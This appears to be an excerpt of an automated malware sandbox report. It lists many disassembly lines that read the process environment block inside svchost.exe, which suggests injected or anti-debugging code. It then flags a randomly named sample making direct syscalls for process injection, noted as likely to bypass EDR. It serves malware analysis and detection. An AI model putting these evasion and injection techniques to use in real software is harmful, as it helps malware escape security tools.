Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336E443 mov eax, dword ptr fs:[00000030h]	2_2_0336E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033644B0 mov ecx, dword ptr fs:[00000030h]	2_2_033644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BA4B0 mov eax, dword ptr fs:[00000030h]	2_2_033BA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033364AB mov eax, dword ptr fs:[00000030h]	2_2_033364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033EA49A mov eax, dword ptr fs:[00000030h]	2_2_033EA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033304E5 mov ecx, dword ptr fs:[00000030h]	2_2_033304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]	2_2_0335EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335EB20 mov eax, dword ptr fs:[00000030h]	2_2_0335EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]	2_2_033F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033F8B28 mov eax, dword ptr fs:[00000030h]	2_2_033F8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AEB1D mov eax, dword ptr fs:[00000030h]	2_2_033AEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0332CB7E mov eax, dword ptr fs:[00000030h]	2_2_0332CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DEB50 mov eax, dword ptr fs:[00000030h]	2_2_033DEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E4B4B mov eax, dword ptr fs:[00000030h]	2_2_033E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E4B4B mov eax, dword ptr fs:[00000030h]	2_2_033E4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C6B40 mov eax, dword ptr fs:[00000030h]	2_2_033C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C6B40 mov eax, dword ptr fs:[00000030h]	2_2_033C6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FAB40 mov eax, dword ptr fs:[00000030h]	2_2_033FAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D8B42 mov eax, dword ptr fs:[00000030h]	2_2_033D8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340BBE mov eax, dword ptr fs:[00000030h]	2_2_03340BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340BBE mov eax, dword ptr fs:[00000030h]	2_2_03340BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_033E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033E4BB0 mov eax, dword ptr fs:[00000030h]	2_2_033E4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]	2_2_03338BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]	2_2_03338BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338BF0 mov eax, dword ptr fs:[00000030h]	2_2_03338BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335EBFC mov eax, dword ptr fs:[00000030h]	2_2_0335EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_033BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DEBD0 mov eax, dword ptr fs:[00000030h]	2_2_033DEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]	2_2_03350BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]	2_2_03350BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03350BCB mov eax, dword ptr fs:[00000030h]	2_2_03350BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]	2_2_03330BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]	2_2_03330BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330BCD mov eax, dword ptr fs:[00000030h]	2_2_03330BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03354A35 mov eax, dword ptr fs:[00000030h]	2_2_03354A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03354A35 mov eax, dword ptr fs:[00000030h]	2_2_03354A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336CA38 mov eax, dword ptr fs:[00000030h]	2_2_0336CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336CA24 mov eax, dword ptr fs:[00000030h]	2_2_0336CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335EA2E mov eax, dword ptr fs:[00000030h]	2_2_0335EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BCA11 mov eax, dword ptr fs:[00000030h]	2_2_033BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033ACA72 mov eax, dword ptr fs:[00000030h]	2_2_033ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033ACA72 mov eax, dword ptr fs:[00000030h]	2_2_033ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]	2_2_0336CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]	2_2_0336CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336CA6F mov eax, dword ptr fs:[00000030h]	2_2_0336CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033DEA60 mov eax, dword ptr fs:[00000030h]	2_2_033DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03336A50 mov eax, dword ptr fs:[00000030h]	2_2_03336A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340A5B mov eax, dword ptr fs:[00000030h]	2_2_03340A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03340A5B mov eax, dword ptr fs:[00000030h]	2_2_03340A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338AA0 mov eax, dword ptr fs:[00000030h]	2_2_03338AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03338AA0 mov eax, dword ptr fs:[00000030h]	2_2_03338AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03386AA4 mov eax, dword ptr fs:[00000030h]	2_2_03386AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03368A90 mov edx, dword ptr fs:[00000030h]	2_2_03368A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333EA80 mov eax, dword ptr fs:[00000030h]	2_2_0333EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404A80 mov eax, dword ptr fs:[00000030h]	2_2_03404A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336AAEE mov eax, dword ptr fs:[00000030h]	2_2_0336AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336AAEE mov eax, dword ptr fs:[00000030h]	2_2_0336AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330AD0 mov eax, dword ptr fs:[00000030h]	2_2_03330AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03364AD0 mov eax, dword ptr fs:[00000030h]	2_2_03364AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03364AD0 mov eax, dword ptr fs:[00000030h]	2_2_03364AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]	2_2_03386ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]	2_2_03386ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03386ACC mov eax, dword ptr fs:[00000030h]	2_2_03386ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B892A mov eax, dword ptr fs:[00000030h]	2_2_033B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C892B mov eax, dword ptr fs:[00000030h]	2_2_033C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BC912 mov eax, dword ptr fs:[00000030h]	2_2_033BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328918 mov eax, dword ptr fs:[00000030h]	2_2_03328918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03328918 mov eax, dword ptr fs:[00000030h]	2_2_03328918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h]	2_2_033AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033AE908 mov eax, dword ptr fs:[00000030h]	2_2_033AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h]	2_2_033D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D4978 mov eax, dword ptr fs:[00000030h]	2_2_033D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BC97C mov eax, dword ptr fs:[00000030h]	2_2_033BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]	2_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]	2_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03356962 mov eax, dword ptr fs:[00000030h]	2_2_03356962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0337096E mov eax, dword ptr fs:[00000030h]	2_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0337096E mov edx, dword ptr fs:[00000030h]	2_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0337096E mov eax, dword ptr fs:[00000030h]	2_2_0337096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B0946 mov eax, dword ptr fs:[00000030h]	2_2_033B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B89B3 mov esi, dword ptr fs:[00000030h]	2_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h]	2_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033B89B3 mov eax, dword ptr fs:[00000030h]	2_2_033B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033429A0 mov eax, dword ptr fs:[00000030h]	2_2_033429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033309AD mov eax, dword ptr fs:[00000030h]	2_2_033309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033309AD mov eax, dword ptr fs:[00000030h]	2_2_033309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h]	2_2_033629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033629F9 mov eax, dword ptr fs:[00000030h]	2_2_033629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_033BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0333A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0333A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033649D0 mov eax, dword ptr fs:[00000030h]	2_2_033649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_033FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C69C0 mov eax, dword ptr fs:[00000030h]	2_2_033C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov ecx, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03352835 mov eax, dword ptr fs:[00000030h]	2_2_03352835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336A830 mov eax, dword ptr fs:[00000030h]	2_2_0336A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D483A mov eax, dword ptr fs:[00000030h]	2_2_033D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033D483A mov eax, dword ptr fs:[00000030h]	2_2_033D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BC810 mov eax, dword ptr fs:[00000030h]	2_2_033BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BE872 mov eax, dword ptr fs:[00000030h]	2_2_033BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BE872 mov eax, dword ptr fs:[00000030h]	2_2_033BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C6870 mov eax, dword ptr fs:[00000030h]	2_2_033C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033C6870 mov eax, dword ptr fs:[00000030h]	2_2_033C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03360854 mov eax, dword ptr fs:[00000030h]	2_2_03360854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334859 mov eax, dword ptr fs:[00000030h]	2_2_03334859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03334859 mov eax, dword ptr fs:[00000030h]	2_2_03334859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03342840 mov ecx, dword ptr fs:[00000030h]	2_2_03342840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034008C0 mov eax, dword ptr fs:[00000030h]	2_2_034008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033BC89D mov eax, dword ptr fs:[00000030h]	2_2_033BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03330887 mov eax, dword ptr fs:[00000030h]	2_2_03330887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0336C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0336C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0336C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_033FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_033FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0335E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0335EF28 mov eax, dword ptr fs:[00000030h]	2_2_0335EF28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03332F12 mov eax, dword ptr fs:[00000030h]	2_2_03332F12
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03404F68 mov eax, dword ptr fs:[00000030h]	2_2_03404F68

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe

Code function: 0_2_004980A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_004980A9

Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_0046A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0046A155
Source: C:\Users\user\Desktop\AxKxwW9WGa.exe	Code function: 0_2_0046A124 SetUnhandledExceptionFilter,		0_2_0046A124

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtCreateMutant: Direct from: 0x774635CC	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtWriteVirtualMemory: Direct from: 0x77462E3C	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtMapViewOfSection: Direct from: 0x77462D1C	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtResumeThread: Direct from: 0x774636AC	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtProtectVirtualMemory: Direct from: 0x77462F9C	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtSetInformationProcess: Direct from: 0x77462C5C	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtSetInformationThread: Direct from: 0x774563F9	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtNotifyChangeKey: Direct from: 0x77463C2C	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtProtectVirtualMemory: Direct from: 0x77457B2E	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtAllocateVirtualMemory: Direct from: 0x77462BFC	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtQueryInformationProcess: Direct from: 0x77462C26	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtResumeThread: Direct from: 0x77462FBC	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtReadFile: Direct from: 0x77462ADC	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtQuerySystemInformation: Direct from: 0x77462DFC	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtDelayExecution: Direct from: 0x77462DDC	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtAllocateVirtualMemory: Direct from: 0x77463C9C	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtClose: Direct from: 0x77462B6C
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtCreateUserProcess: Direct from: 0x7746371C	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtWriteVirtualMemory: Direct from: 0x7746490C	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtAllocateVirtualMemory: Direct from: 0x774648EC	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtQuerySystemInformation: Direct from: 0x774648CC	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtQueryVolumeInformationFile: Direct from: 0x77462F2C	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtCreateKey: Direct from: 0x77462C6C	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtReadVirtualMemory: Direct from: 0x77462E8C	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtSetInformationThread: Direct from: 0x77462B4C	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtQueryAttributesFile: Direct from: 0x77462E6C	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtDeviceIoControlFile: Direct from: 0x77462AEC	Jump to behavior
Source: C:\Program Files (x86)\TyCUuzIBxeEhwtUYiAdHdSiqvuywUWUQzsnImdqKBiTobCHqqEWoWSkRmUsEBmjHjxSAR\TCRjLpECkFbdcm.exe	NtOpenSection: Direct from: 0x77462E0C	Jump to behavior
